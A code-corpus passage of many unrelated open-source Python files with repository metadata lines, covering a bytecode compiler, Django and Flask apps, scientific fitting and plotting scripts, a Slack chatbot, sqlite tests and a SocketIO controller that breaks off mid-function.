l = bytecode[i]
if isinstance(l, SingleInstruction) and l.opcode == 'PUSH_WORD' and l.ref.value == ';':
l.opcode = 'LABDA'
l.ref = Marker()
bytecode.extend([
SingleInstruction('RETURN', 0),
l.ref,
])
break
else:
raise DejaSyntaxError('Inline lambda without closing semi-colon.')
elif '!' in w.value:
if w.value.startswith('!'):
w.value = 'eva' + w.value
if w.value.endswith('!'):
w.value = w.value[:-1]
args = w.value.split('!')
base = args.pop(0)
bytecode.extend(SingleInstruction('PUSH_LITERAL', x) for x in reversed(args))
bytecode.extend([
SingleInstruction('PUSH_WORD', base),
SingleInstruction('GET_DICT', 0),
SingleInstruction('CALL', 0)
])
else:
bytecode.append(SingleInstruction('PUSH_WORD', w))
elif isinstance(w, Number) and w.value.is_integer() and w.value <= POS_SIZE and w.value >= NEG_SIZE:
bytecode.append(SingleInstruction('PUSH_INTEGER', int(w.value)))
else:
bytecode.append(SingleInstruction('PUSH_LITERAL', w))
elif isinstance(k, Marker):
bytecode.append(k)
elif isinstance(k, GoTo):
bytecode.append(SingleInstruction('JMP', k.index))
elif isinstance(k, Branch):
bytecode.append(SingleInstruction('JMPZ', k.index))
elif isinstance(k, LabdaNode):
bytecode.append(SingleInstruction('LABDA', k.index))
bytecode.append(SingleInstruction('RETURN', 0))
return bytecode
def is_return(node):
return isinstance(node, SingleInstruction) and node.opcode == 'RETURN'
def is_jump_to(node, marker):
return isinstance(node, SingleInstruction) and node.opcode == 'JMP' and node.ref is marker
def is_pass(node):
return isinstance(node, SingleInstruction) and node.opcode == 'PUSH_WORD' and (node.ref == 'pass' or (isinstance(node.ref, ProperWord) and node.ref.value == 'pass'))
def is_linenr(node):
return isinstance(node, SingleInstruction) and node.opcode == 'LINE_NUMBER'
def get(l, i):
try:
return l[i]
except IndexError:
return None
def optimize(flattened): #optimize away superfluous RETURN statements
for i, instruction in reversed(list(enumerate(flattened))):
if (is_return(instruction) and (is_return(get(flattened, i + 1)) or (isinstance(get(flattened, i + 1), Marker) and is_return(get(flattened, i + 2))))
or isinstance(get(flattened, i + 1), Marker) and is_jump_to(instruction, get(flattened, i + 1))
or isinstance(get(flattened, i + 2), Marker) and isinstance(get(flattened, i + 1), Marker) and is_jump_to(instruction, get(flattened, i + 2))
or is_pass(instruction)
or is_linenr(instruction) and is_linenr(get(flattened, i + 1))
):
flattened.pop(i)
return flattened
def refine(flattened): #removes all markers and replaces them by indices
#first pass: fill dictionary
memo = {}
i = 0
while i < len(flattened):
item = flattened[i]
if isinstance(item, Marker):
memo[item] = i
del flattened[i]
else:
i += 1
#second pass: change all goto and branches
for i, item in enumerate(flattened):
if item.opcode in positional_instructions:
item.ref = memo[item.ref] - i
return flattened
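# Worked example (illustrative): suppose after optimize() the list is
#   [JMP -> markerA, PUSH_INTEGER 1, markerA, RETURN]
# The first pass of refine() deletes markerA (index 2) and records
# memo[markerA] = 2; the second pass rewrites the JMP at index 0 to
# ref = 2 - 0 = 2, so positional instructions end up holding relative
# offsets instead of Marker objects.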
| gvx/deja | convert.py | Python | isc | 5,277 |
# Generated by Django 2.2.10 on 2020-04-29 12:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0020_auto_20200421_0851'),
]
operations = [
migrations.AddField(
model_name='localconfig',
name='need_dovecot_update',
field=models.BooleanField(default=False),
),
]
| modoboa/modoboa | modoboa/core/migrations/0021_localconfig_need_dovecot_update.py | Python | isc | 403 |
from . import meta_selector # noqa
from .pg import PatternGenerator
from .selector import Selector
PatternGenerator('')
Selector('')
| stack-of-tasks/sot-pattern-generator | src/dynamic_graph/sot/pattern_generator/__init__.py | Python | isc | 136 |
# -*- coding: utf8 -*-
import subprocess
import os
from pathlib import Path
cwd = os.getcwd()
res = None
try:

print(os.getcwd())
subprocess.call(['make'])
# res = subprocess.check_output('uname -a',shell=True)
res = subprocess.check_output(
r"./darknet detector test cfg/coco.data cfg/yolo.cfg yolo.weights /home/zaki/NoooDemo/0001.jpg", shell=True)
except Exception as ex:
print(ex)
finally:
os.chdir(cwd)
print(res)
def main() -> None:
pass
if __name__ == '__main__':
main()
| umyuu/Sample | src/Python3/Q113190/exsample.py | Python | mit | 512 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
from loguru import logger
from pathlib import Path
def check_meta_yaml_for_noarch(fn:Path, text=None):
import re
logger.debug("Checking for noarch")
if text is None:
with open(fn, "rt") as fl:
text = fl.read()
mo = re.search(r"\n\s*noarch_python:\s*True", text)
if mo:
logger.info("Detected conda noarch python")
return True
mo = re.search(r"\n\s*noarch:\s*python", text)
if mo:
logger.info("Detected conda noarch python")
return True
return False
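# Usage sketch (illustrative; the recipe path is hypothetical):
#
#   from pathlib import Path
#   if check_meta_yaml_for_noarch(Path("recipe/meta.yaml")):
#       ...  # the conda recipe is marked noarch / noarch_python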
| mjirik/discon | discon/discon_tools.py | Python | mit | 600 |
# coding: utf-8
from __future__ import unicode_literals
import re
import os
from django.shortcuts import render
from django.conf import settings
def index(request):
p = re.compile(r'^app\d+_')
apps = (a.split('_') for a in settings.INSTALLED_APPS if p.match(a))
return render(request, 'ignore_me/index.html',
{"apps": sorted(apps), "settings": settings})
| sametmax/Django--an-app-at-a-time | ignore_this_directory/ignore_me/views.py | Python | mit | 391 |
from __future__ import print_function, division, absolute_import
from george import kernels, GP
import numpy as np
from kglib import fitters
from scipy.integrate import quad
from scipy.optimize import minimize
class HistFitter(fitters.Bayesian_LS):
def __init__(self, mcmc_samples, bin_edges):
"""
Histogram Inference a la Dan Foreman-Mackey
Parameters:
===========
- mcmc_samples: numpy array of shape (Nobs, Nsamples)
MCMC samples for the thing you want to histogram
- bin_edges: numpy.ndarray array
The edges of the histogram bins to use.
"""
self.mcmc_samples = mcmc_samples
self.bin_edges = bin_edges
self.bin_centers = (self.bin_edges[:-1] + self.bin_edges[1:]) / 2
self.bin_widths = np.diff(self.bin_edges)
self.Nbins = self.bin_widths.size
self.Nobs = self.mcmc_samples.shape[0]
# Find which bin each q falls in
self.bin_idx = np.digitize(self.mcmc_samples, self.bin_edges) - 1
# Determine the censoring function for each bin (used in the integral)
self.censor_integrals = np.array([quad(func=self.censoring_fcn,
a=left, b=right)[0] for (left, right) in
zip(self.bin_edges[:-1], self.bin_edges[1:])])
# Set values needed for multinest fitting
self.n_params = self.Nbins
self.param_names = [r'$\theta_{}$'.format(i) for i in range(self.Nbins)]
def lnlike(self, pars):
# Pull theta out of pars
theta = pars[:self.Nbins]
# Generate the inner summation
gamma = np.ones_like(self.bin_idx) * np.nan
good = (self.bin_idx < self.Nbins) & (self.bin_idx >= 0) # nans in q get put in nonexistent bins
gamma[good] = self.Nobs * self.censoring_fcn(self.mcmc_samples[good]) * theta[self.bin_idx[good]]
summation = np.nanmean(gamma, axis=1)
# Calculate the integral
I = self._integral_fcn(theta)
# Generate the log-likelihood
ll = -I + np.nansum(np.log(summation))
return ll
def lnprior(self, pars):
""" Override this if you want to set a better prior on the bin heights. """
if all([p > 0 and p < 10 for p in pars]):
return 0
return -np.inf
def lnprob(self, pars):
lp = self.lnprior(pars)
return lp + self.lnlike(pars) if np.isfinite(lp) else -np.inf
def _integral_fcn(self, theta):
return np.sum(theta * self.censor_integrals) * self.Nobs
def censoring_fcn(self, value):
"""
Censoring function. This should return the completeness of your survey to the given value.
"""
return 1.0
def guess_fit(self):
def errfcn(pars):
ll = self.lnprob(pars)
return -ll
initial_guess = np.ones_like(self.bin_centers)
bounds = [[1e-3, None] for p in initial_guess]
out = minimize(errfcn, initial_guess, bounds=bounds)
return out.x
def mnest_prior(self, cube, ndim, nparams):
# All bins are in the range (0, 10)
for i in range(self.Nbins):
cube[i] *= 10
return
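# Usage sketch (illustrative only; the samples below are synthetic and the
# exact sampling entry point of fitters.Bayesian_LS is not shown here):
#
#   import numpy as np
#   samples = np.random.uniform(0, 1, size=(50, 300))   # shape (Nobs, Nsamples)
#   edges = np.linspace(0, 1, 11)
#   fitter = HistFitter(samples, edges)
#   theta0 = fitter.guess_fit()     # quick maximum-likelihood bin heights
#   ll = fitter.lnlike(theta0)      # log-likelihood of those heights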
class CensoredHistFitter(HistFitter):
"""
Inherits from HistFitter, but actually defines the censoring function
"""
def censoring_fcn(self, val, alpha=40, beta=0.25):
# sigmoid censoring function. Change this for the real deal!
return 1.0 / (1.0 + np.exp(-alpha * (val - beta)))
class SmoothHistFitter(CensoredHistFitter):
"""
A subclass of HistogramFitter that puts a gaussian process smoothing prior on the bin heights
"""
def __init__(self, *args, **kwargs):
super(SmoothHistFitter, self).__init__(*args, **kwargs)
self.smoothing = self.mcmc_samples.shape[0] / self.Nbins
self.n_params = self.Nbins + 4
self.param_names = [r'$\theta_{}$'.format(i) for i in range(self.Nbins)]
self.param_names.extend(('lna', 'lntau', 'lnerr', 'mean'))
def lnprior(self, pars):
"""
Smoothing prior using gaussian process.
We will learn the hyperparameters and marginalize over them.
"""
theta = pars[:self.Nbins]
if np.any(theta < 0):
return -np.inf
a, tau, err = np.exp(pars[self.Nbins:-1])
mean = pars[-1]
kernel = a * kernels.ExpSquaredKernel(tau)
gp = GP(kernel, mean=mean)
gp.compute(self.bin_centers, yerr=err)
return gp.lnlikelihood(theta) / self.smoothing
def guess_fit(self):
"""
This doesn't work too great, but the full MCMC fit looks good.
"""
def errfcn(pars):
ll = self.lnprob(pars)
return -ll
# Set up initial guesses
initial_guess = np.ones(self.bin_centers.size + 4)
initial_guess[-4] = 0.0
initial_guess[-3] = -0.25
initial_guess[-2] = -1.0
initial_guess[-1] = -1.0
# Set up bounds
bounds = [[1e-3, None] for p in self.bin_centers]
bounds.append([-10, 20])
bounds.append([-10, 10])
bounds.append((-1, 5))
bounds.append((-10, 10))
# Minimize
out = minimize(errfcn, initial_guess, bounds=bounds)
return out.x
def _lnlike(self, pars):
return self.lnprob(pars)
def mnest_prior(self, cube, ndim, nparams):
for i in range(self.Nbins):
cube[i] *= 10
cube[self.Nbins] = cube[self.Nbins] * 30 - 10
cube[self.Nbins + 1] = cube[self.Nbins + 1] * 20 - 10
cube[self.Nbins + 2] = cube[self.Nbins + 2] * 7 - 2
cube[self.Nbins + 3] = cube[self.Nbins + 3] * 20 - 10
return | kgullikson88/gullikson-scripts | kglib/fitters/histogram.py | Python | mit | 5,838 |
# ------------------------------------------------------
# current.py
#
# Plot a current field at fixed depth
# Modified from the spermplot example
#
# Bjørn Ådlandsvik <[email protected]>
# 2020-03-27
# ------------------------------------------------------
# -------------
# Imports
# -------------
import numpy as np
import matplotlib.pyplot as plt
from netCDF4 import Dataset
from roppy import SGrid
from roppy.mpl_util import landmask
from roppy.trajectories import curly_vectors
# -------------------------
# User settings
# ------------------------
ncfile = "data/ocean_avg_example.nc"
timeframe = 3 # Fourth time frame
# subgrid = (1,-1,1,-1) # whole grid except boundary cells
subgrid = (110, 170, 35, 90)
# Depth level [m]
z = 25
# Distance between vectors
stride = 2
# Speed level (isotachs)
speedlevels = np.linspace(0, 0.5, 6) # 0.0, 0.1, ...., 0.5
# Colormap for speed
speedcolors = "YlOrRd"
# --------------------
# Read the data
# --------------------
f = Dataset(ncfile)
grid = SGrid(f, subgrid=subgrid)
# Read 3D current for the subgrid
U0 = f.variables["u"][timeframe, :, grid.Ju, grid.Iu]
V0 = f.variables["v"][timeframe, :, grid.Jv, grid.Iv]
Mu = f.variables["mask_u"][grid.Ju, grid.Iu]
Mv = f.variables["mask_v"][grid.Jv, grid.Iv]
# f.close()
# ----------------------
# Handle the data
# ----------------------
# Interpolate to rho-points
U1 = 0.5 * (U0[:, :, :-1] + U0[:, :, 1:])
V1 = 0.5 * (V0[:, :-1, :] + V0[:, 1:, :])
# Interpolate to correct depth level
U = grid.zslice(U1, z)
V = grid.zslice(V1, z)
# Remove velocity at land and below bottom
U[grid.h < z] = np.nan
V[grid.h < z] = np.nan
# Compute the current speed
Speed = np.sqrt(U * U + V * V)
# Impose the stride
X = grid.X[::stride]
Y = grid.Y[::stride]
U = U[::stride, ::stride]
V = V[::stride, ::stride]
# --------------------
# Make the plot
# --------------------
# Contour plot of current speed
plt.contourf(grid.X, grid.Y, Speed, levels=speedlevels, cmap=speedcolors)
plt.colorbar()
# Make the vector plot
plt.quiver(X, Y, U, V, width=0.003)
# Plot green land mask
landmask(grid, "LightGreen")
# Set correct aspect ratio and axis limits
plt.axis("image")
plt.axis((grid.i0 + 0.5, grid.i1 - 1.5, grid.j0 + 0.5, grid.j1 - 1.5))
# Display the plot
plt.show()
| bjornaa/roppy | examples/plot_current25.py | Python | mit | 2,273 |
from __init__ import redis_db
from werkzeug.security import generate_password_hash, check_password_hash
from os import urandom
from base64 import b64encode
class User(object):
def __init__(self):
self.username = "" # required
self.password_hash = "" # required
self.phone_number = "" # required
self.emergency_contact = "" # not required
self.secret_key = b64encode(urandom(64)).decode("utf-8")
self.contacts = set() # can be empty
def set_password(self, password):
self.password_hash = generate_password_hash(password, method="pbkdf2:sha256", salt_length=32)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def write_to_db(self):
user_dict = {"password_hash": self.password_hash, "phone_number": self.phone_number,
"secret_key": self.secret_key, "emergency_contact": self.emergency_contact}
redis_db.hmset(self.username, user_dict)
redis_db.delete(self.username + ":contacts")
if len(self.contacts):
redis_db.sadd(self.username + ":contacts", *self.contacts)
def deauthenticate(self):
self.secret_key = b64encode(urandom(64)).decode("utf-8")
@classmethod
def get_from_db(cls, username):
user_dict = redis_db.hmget(username, ["password_hash", "phone_number", "secret_key", "emergency_contact"])
fetched_user = User()
fetched_user.username = username
fetched_user.password_hash = user_dict[0]
fetched_user.phone_number = user_dict[1]
fetched_user.secret_key = user_dict[2]
fetched_user.emergency_contact = user_dict[3]
if not fetched_user.password_hash or not fetched_user.phone_number or not fetched_user.secret_key:
return None
else:
fetched_user.contacts = redis_db.smembers(fetched_user.username + ":contacts")
return fetched_user
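# Usage sketch (illustrative; all field values are made up):
#
#   user = User()
#   user.username = "alice"
#   user.phone_number = "+15555550100"
#   user.set_password("hunter2")
#   user.write_to_db()
#
#   fetched = User.get_from_db("alice")
#   assert fetched is not None and fetched.verify_password("hunter2")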
| BrambleLLC/HackAZ-2016 | server/webapp/models.py | Python | mit | 1,957 |
import functions
import heapq
import vtbase
### Classic stream iterator
registered = True
class StreamExcept(vtbase.VT):
def BestIndex(self, constraints, orderbys):
return (None, 0, None, True, 1000)
def VTiter(self, *parsedArgs, **envars):
largs, dictargs = self.full_parse(parsedArgs)
if len(largs) < 1:
raise functions.OperatorError(__name__.rsplit('.')[-1], "Not defined union tables ")
streams = str(largs[0]).split(",")
if len(streams) < 2:
raise functions.OperatorError(__name__.rsplit('.')[-1], "Union tables must be more than one ")
cursors = []
execs = []
for stream in streams:
cursors.append(envars['db'].cursor())
execs.append(cursors[-1].execute("select * from " + str(stream) + ";"))
comparedcursor = str(cursors[0].getdescriptionsafe())
# for cursor in cursors:
# if str(cursor.getdescriptionsafe()) != comparedcursor:
# raise functions.OperatorError(__name__.rsplit('.')[-1],"Union tables with different schemas ")
if 'cols' in dictargs:
try:
cols = int(dictargs['cols'])
except ValueError:
try:
cols = [y[0] for y in cursors[0].getdescriptionsafe()].index(dictargs['cols'])
except ValueError:
raise functions.OperatorError(__name__.rsplit('.')[-1], "Column name does not exists ")
else:
cols = 0
if cols >= len(cursors[0].getdescriptionsafe()):
raise functions.OperatorError(__name__.rsplit('.')[-1], "Column position does not exists ")
        for x in range(0, len(streams)):
            if x == 0:
                execs[0] = ((v[cols], (0,) + v) for v in execs[0])
            elif x == 1:
                execs[1] = ((v[cols], (1,) + v) for v in execs[1])
            elif x == 2:
                execs[2] = ((v[cols], (2,) + v) for v in execs[2])
            elif x == 3:
                execs[3] = ((v[cols], (3,) + v) for v in execs[3])
            elif x == 4:
                execs[4] = ((v[cols], (4,) + v) for v in execs[4])
try:
yield list(cursors[0].getdescriptionsafe())
except StopIteration:
try:
raise
finally:
try:
for cur in cursors:
cur.close()
except:
pass
currentgroup = None
lists = [[]] * len(streams)
for k, v in heapq.merge(*execs):
if currentgroup is None or currentgroup != k:
unionset = set().union(*lists[1:])
for t in (set(lists[0]) - unionset):
yield t
lists = [[]] * len(streams)
lists[v[0]] = lists[v[0]] + [tuple(v[1:])]
currentgroup = k
unionset = set().union(*lists[1:])
for t in list(set(lists[0]) - unionset):
yield t
def Source():
return vtbase.VTGenerator(StreamExcept)
if not ('.' in __name__):
"""
This is needed to be able to test the function, put it at the end of every
new function you create
"""
import sys
from functions import *
testfunction()
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('utf-8')
import doctest
doctest.testmod()
| madgik/exareme | Exareme-Docker/src/exareme/exareme-tools/madis/src/functions/vtable/streamexcept.py | Python | mit | 3,449 |
import json, logging, os, re, subprocess, shlex
from tools import get_category_by_status
log = logging.getLogger()
meta_files = ['Disassembly', 'Stacktrace', 'Registers',
'SegvAnalysis', 'ProcMaps', "BootLog" , "CoreDump",
"BootDmesg", "syslog", "UbiquityDebug.gz", "Casper.gz",
"UbiquityPartman.gz", "UbiquityDm.gz", "GdmLog", "XorgLog"
"log", "Log"]
def get(metadata, bugdir):
indicators = {}
# look for file arg; this needs work TODO
cmdline = None
uri = None
for line in metadata['description'].splitlines():
if "proccmdline" in line.lower():
cmdline = ":".join(line.split(":")[1:]).strip()
try:
toks = shlex.split(cmdline)
except ValueError as e:
log.error("error while parsing cmdline: %s" % cmdline)
log.exception(e)
continue
if len(toks) > 1:
if ("//" in toks[-1]) or ("." in toks[-1]):
uri = toks[-1].strip()
indicators['cmdline'] = cmdline
indicators['cmdline_uri'] = uri
# look for interesting attachments; ugly
interesting_files = []
for f in os.listdir(bugdir):
fpath = os.path.join(bugdir, f)
if not os.path.isfile(fpath):
continue
for fn in meta_files:
if fn.lower() in f.lower():
break
else:
# no break in loop above, i.e. still interested
out = subprocess.check_output(["file", fpath])
ftype = out.split(":")[-1]
if ftype.strip() == "empty":
continue
for tstr in ["ASCII", "text", "core file"]:
if tstr in ftype:
break
else:
# only runs if we didn't break, i.e., this might be interesting
interesting_files.append(f)
indicators['files'] = interesting_files
    # TODO: look for recv, etc. in stacks (should this be in exploitability maybe (remote?))
return indicators
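# Shape of the returned indicators dict (all values here are hypothetical):
#   {"cmdline": "evince http://example.com/a.pdf",
#    "cmdline_uri": "http://example.com/a.pdf",
#    "files": ["attachment.bin"]}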
| jfoote/vulture | vlib/analyzers/reproducibility.py | Python | mit | 2,072 |
import hashlib
import os
import sys
if len(sys.argv) < 3: #1
print("You need to specify two directories:") #1
print(sys.argv[0], "<directory 1> <directory 2>") #1
sys.exit() #1
directory1 = sys.argv[1] #2
directory2 = sys.argv[2] #2
print("Comparing:")
print(directory1)
print(directory2)
for directory in [directory1, directory2]:
if not os.access(directory, os.F_OK):
print(directory, "is not a valid directory!")
sys.exit()
def md5(file_path):
read_file = open(file_path, "rb")
the_hash = hashlib.md5()
for line in read_file.readlines():
the_hash.update(line)
return the_hash.hexdigest()
def directory_listing(directory_name):
dir_file_list = {}
dir_root = None
dir_trim = 0
for path, dirs, files in os.walk(directory_name):
if dir_root is None:
dir_root = path
dir_trim = len(dir_root)
print("dir", directory_name, end=' ')
print("root is", dir_root)
trimmed_path = path[dir_trim:]
if trimmed_path.startswith(os.path.sep):
trimmed_path = trimmed_path[1:]
#print "path is", path, " and trimmed_path is", trimmed_path
for each_file in files:
file_path = os.path.join(trimmed_path, each_file)
dir_file_list[file_path] = True
return (dir_file_list, dir_root)
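# Illustrative example (paths hypothetical): for a tree
#   /data/dir1/a.txt
#   /data/dir1/sub/b.txt
# directory_listing("/data/dir1") returns ({"a.txt": True, "sub/b.txt": True},
# "/data/dir1") -- the keys are root-relative, so the two trees can be
# compared file by file below.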
dir1_file_list, dir1_root = directory_listing(directory1)
dir2_file_list, dir2_root = directory_listing(directory2)
results = {}
for file_path in list(dir2_file_list.keys()):
if file_path not in dir1_file_list:
results[file_path] = "not found in directory 1"
else:
#print file_path, "found in directory 1 and 2"
file1 = os.path.join(dir1_root, file_path)
file2 = os.path.join(dir2_root, file_path)
if md5(file1) != md5(file2):
results[file_path] = "is different in directory 2"
else:
results[file_path] = "is the same in both"
for file_path, value in list(dir1_file_list.items()):
if file_path not in results:
results[file_path] = "not found in directory 2"
print()
for path, result in sorted(results.items()):
if os.path.sep not in path and "same" not in result:
print(path, result)
for path, result in sorted(results.items()):
if os.path.sep in path and "same" not in result:
print(path, result)
| AnthonyBriggs/Python-101 | hello_python_source_py3/chapter 03/difference_engine_5_inorder.py | Python | mit | 2,533 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This test module tests the methods related to :class:`sqlite4dummy.schema.MetaData`.
class, method, func, exception
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from sqlite4dummy import *
from sqlite4dummy.tests.basetest import *
from datetime import datetime, date
import unittest
class MetaDataUnittest(unittest.TestCase):
"""Unittest of :class:`sqlite4dummy.schema.MetaData`.
    Unit tests for the methods of MetaData.
"""
def setUp(self):
self.engine = Sqlite3Engine(":memory:", autocommit=False)
self.metadata = MetaData()
self.int_ = 1
self.float_ = 3.14
self.str_ = r"""\/!@#$%^&*()_+-=~`|[]{}><,.'"?"""
self.bytes_ = "abc".encode("utf-8")
self.date_ = date(2000, 1, 1)
self.datetime_ = datetime(2015, 10, 1, 18, 30, 0, 123)
self.pickle_ = [1, 2, 3]
self.test = Table("test", self.metadata,
Column("_id", dtype.INTEGER, primary_key=True, nullable=False),
Column("_int_with_default", dtype.INTEGER, default=self.int_),
Column("_float_with_default", dtype.REAL, default=self.float_),
Column("_str_with_default", dtype.TEXT, default=self.str_),
Column("_bytes_with_default", dtype.BLOB, default=self.bytes_),
Column("_date_with_default", dtype.DATE, default=self.date_),
Column("_datetime_with_default", dtype.DATETIME, default=self.datetime_),
Column("_pickle_with_default", dtype.PICKLETYPE, default=self.pickle_),
Column("_int", dtype.INTEGER),
Column("_float", dtype.REAL),
Column("_str", dtype.TEXT),
Column("_bytes", dtype.BLOB),
Column("_date", dtype.DATE),
Column("_datetime", dtype.DATETIME),
Column("_pickle", dtype.PICKLETYPE),
)
self.metadata.create_all(self.engine)
self.index = Index("test_index", self.metadata,
[self.test.c._int,
self.test.c._float.desc(),
self.test.c._date,
desc(self.test.c._datetime)],
table_name=self.test,
unique=True,
skip_validate=False,
)
self.index.create(self.engine)
self.assertEqual(
len(self.engine.execute("PRAGMA table_info(test);").fetchall()),
15,
)
self.assertEqual(
len(self.engine.execute(
"SELECT * FROM sqlite_master "
"WHERE type = 'index' AND sql NOT NULL;").fetchall()),
1,
)
def tearDown(self):
self.engine.close()
def test_drop_all(self):
"""测试drop_all是否能drop所有的表。
"""
self.assertEqual(
len(self.engine.execute(
"SELECT * FROM sqlite_master WHERE type = 'table';").fetchall()),
1,
)
self.metadata.drop_all(self.engine)
self.assertEqual(
len(self.engine.execute(
"SELECT * FROM sqlite_master WHERE type = 'table';").fetchall()),
0,
)
        self.assertEqual(len(self.metadata.t), 0) # no tables left
def test_str_repr(self):
# print(self.metadata)
# print(repr(self.metadata))
pass
def test_get_table(self):
"""测试MetaData.get_table(table)方法是否能正确获得Table。
"""
self.assertEqual(self.metadata.get_table("test"), self.test)
self.assertRaises(KeyError,
self.metadata.get_table, "not_existing_table")
def test_get_index(self):
"""测试MetaData.get_index(index)方法是否能正确获得Index。
"""
self.assertEqual(self.metadata.get_index("test_index"), self.index)
self.assertRaises(KeyError,
self.metadata.get_index, "not_existing_index")
def test_reflect(self):
"""测试MetaData.reflect(engine)是否能正确解析出Table, Column, Index的
metadata, 并且解析出Column的default值。
"""
second_metadata = MetaData()
second_metadata.reflect(self.engine,
pickletype_columns=[
"test._pickle_with_default",
"test._pickle",
])
self.assertEqual(second_metadata.get_table("test").\
c._int_with_default.default, self.int_)
self.assertEqual(second_metadata.get_table("test").\
c._float_with_default.default, self.float_)
self.assertEqual(second_metadata.get_table("test").\
c._str_with_default.default, self.str_)
self.assertEqual(second_metadata.get_table("test").\
c._bytes_with_default.default, self.bytes_)
self.assertEqual(second_metadata.get_table("test").\
c._date_with_default.default, self.date_)
self.assertEqual(second_metadata.get_table("test").\
c._datetime_with_default.default, self.datetime_)
self.assertEqual(second_metadata.get_table("test").\
c._pickle_with_default.default, self.pickle_)
self.assertEqual(second_metadata.get_index("test_index").\
index_name, "test_index")
self.assertEqual(second_metadata.get_index("test_index").\
table_name, "test")
self.assertEqual(second_metadata.get_index("test_index").\
unique, True)
self.assertEqual(second_metadata.get_index("test_index").\
params, self.index.params)
if __name__ == "__main__":
unittest.main() | MacHu-GWU/sqlite4dummy-project | sqlite4dummy/tests/functionality/test_MetaData.py | Python | mit | 5,883 |
#!/usr/bin/env python
# https://www.codeeval.com/open_challenges/1/
import sys
def solve(X, Y, N):
r = []
for i in range(1, N + 1):
if i % X == 0 and i % Y == 0:
r.append('FB')
elif i % X == 0:
r.append('F')
elif i % Y == 0:
r.append('B')
else:
r.append(str(i))
print ' '.join(r)
def main():
for line in sys.stdin:
(X, Y, N) = line.strip().split(' ')
solve(int(X), int(Y), int(N))
if __name__ == '__main__':
main()
| guozengxin/codeeval | easy/fizzBuzz.py | Python | mit | 537 |
import ConfigParser
import sys, traceback
from slackclient import SlackClient
from chatterbot import ChatBot
import os
from os import listdir
from os.path import isfile, join
from chatterbot.trainers import ChatterBotCorpusTrainer
config = ConfigParser.SafeConfigParser({"host": "searchhub.lucidworks.com", "port":80})
config.read('config.cfg')
token = config.get("Slack", "token") # found at https://api.slack.com/web#authentication
channel_str = config.get("Slack", "channels")
channel_names = []
if channel_str:
#print (channel_str)
channels = channel_str.split(",")
for channel in channels:
#print channel
channel_names.append(channel)
storage = config.get("Chatterbot", "storage_dir")
if not os.path.exists(storage):
os.makedirs(storage)
bot_name = config.get("Slack", "bot_name")
print "Starting Slack"
sc = SlackClient(token)
print "Starting Chatterbot"
chatbot = ChatBot(bot_name, storage_adapter="chatterbot.adapters.storage.JsonDatabaseAdapter",
logic_adapters=[
"chatterbot.adapters.logic.MathematicalEvaluation",
"chatterbot.adapters.logic.TimeLogicAdapter",
"chatterbot.adapters.logic.ClosestMeaningAdapter",
"adapters.SearchHubLogicAdapter"
],
searchhub_host=config.get("SearchHub", "host"),
searchhub_port=config.get("SearchHub", "port"),
input_adapter="adapters.SlackPythonInputAdapter",
output_adapter="adapters.SlackPythonOutputAdapter",
database=storage + "/database.json",
slack_client=sc,
slack_channels=channel_names,
slack_output_channel=config.get("Slack", "output_channel"),
slack_bot_name=bot_name
)
chatbot.set_trainer(ChatterBotCorpusTrainer)
training_dir = "training"
files = [f for f in listdir(training_dir) if isfile(join(training_dir, f)) and f.endswith(".json") and f.find("example.json") == -1]
for file in files:
print "Training on " + file
chatbot.train("training." + file.replace(".json", ""))
# Train based on english greetings corpus
chatbot.train("chatterbot.corpus.english")
# Train based on the english conversations corpus
#chatbot.train("chatterbot.corpus.english.conversations")
print "Starting Chatbot"
while True:
try:
bot_input = chatbot.get_response(None)
    except Exception:
        print "Exception"
        traceback.print_exc()
| gsingers/rtfmbot | src/python/run.py | Python | mit | 2,559 |
"""
filename: controllers.py
description: Controllers for committee notes.
created by: Chris Lemelin ([email protected])
created on: 04/20/18
"""
from flask_socketio import emit
from app.decorators import ensure_dict
from app import socketio, db
from app.committee_notes.models import *
from app.committees.models import *
from app.users.models import Users
from app.committee_notes.committee_notes_response import Response
##
## @brief Creates a committee note. (Must be admin user or committee head)
##
## @param user_data The user data required to create a committee note
##
## All the following fields are required:
## committee - id of the committee
## description - Description of new committee note
##
@socketio.on('create_committee_note')
@ensure_dict
def create_note(user_data):
user = Users.verify_auth(user_data.get("token", ""))
committe_id = user_data.get('committee', '')
committee = Committees.query.filter_by(id=committe_id).first()
if committee is not None:
if(user is not None and (user.is_admin or committee.head == user.id)):
committee_note = CommitteeNotes()
committee_note.committee = committee.id
committee_note.description = user_data.get('description',"")
committee_note.author = user.id
committee_note.hidden = False
db.session.add(committee_note)
try:
db.session.commit()
emit('create_committee_note', Response.AddSuccess)
            get_notes(committee.id, broadcast = True)
except Exception as e:
db.session.rollback()
db.session.flush()
emit("create_committee_note", Response.AddError)
else:
emit("create_committee_note", Response.UsrNotAuth)
else:
emit("create_committee_note", Response.CommitteeDoesntExist)
##
## @brief Gets committee notes from a committee
##
## @param committee_id - id of the committee
##
@socketio.on('get_committee_notes')
def get_notes(committee_id, broadcast = False):
notes = CommitteeNotes.query.filter_by(committee= committee_id).all()
note_ser = [
{
"id": c.id,
"author": c.author,
"committee": c.committee,
"description": c.description,
"created_at": c.created_at,
"hidden": c.hidden
}
for c in notes
]
emit("get_committee_notes", note_ser, broadcast = broadcast)
##
## @brief Gets a committee note
##
## @param id - id of committee note.
##
@socketio.on('get_committee_note')
def get_note(id, broadcast = False):
note = CommitteeNotes.query.filter_by(id= id).first()
if note is not None:
note_data = {
"id": note.id,
"author": note.author,
"committee": note.committee,
"description": note.description,
"created_at": note.created_at,
"hidden": note.hidden
}
emit('get_committee_note', note_data, broadcast = broadcast)
else:
emit("get_committee_note", {}, broadcast = broadcast)
##
## @brief Edits a committee note (Must be admin user or committee head to hide,
## only the author can edit the description)
##
## @param user_data The user data to edit a note, must
## contain a token, an id and any of the following
## fields:
## - description
## - hidden
##
## Any other field will be ignored.
##
## @emit Emits a success message if edited, errors otherwise.
##
@socketio.on('modify_committee_note')
@ensure_dict
def modify_note(user_data):
user = Users.verify_auth(user_data.get("token",""))
if(user is None):
emit('modify_note', Response.UsrDoesntExist)
return
committee_note_id = user_data.get("id","")
committee_note = CommitteeNotes.query.filter_by(id=committee_note_id).first()
if(committee_note is None):
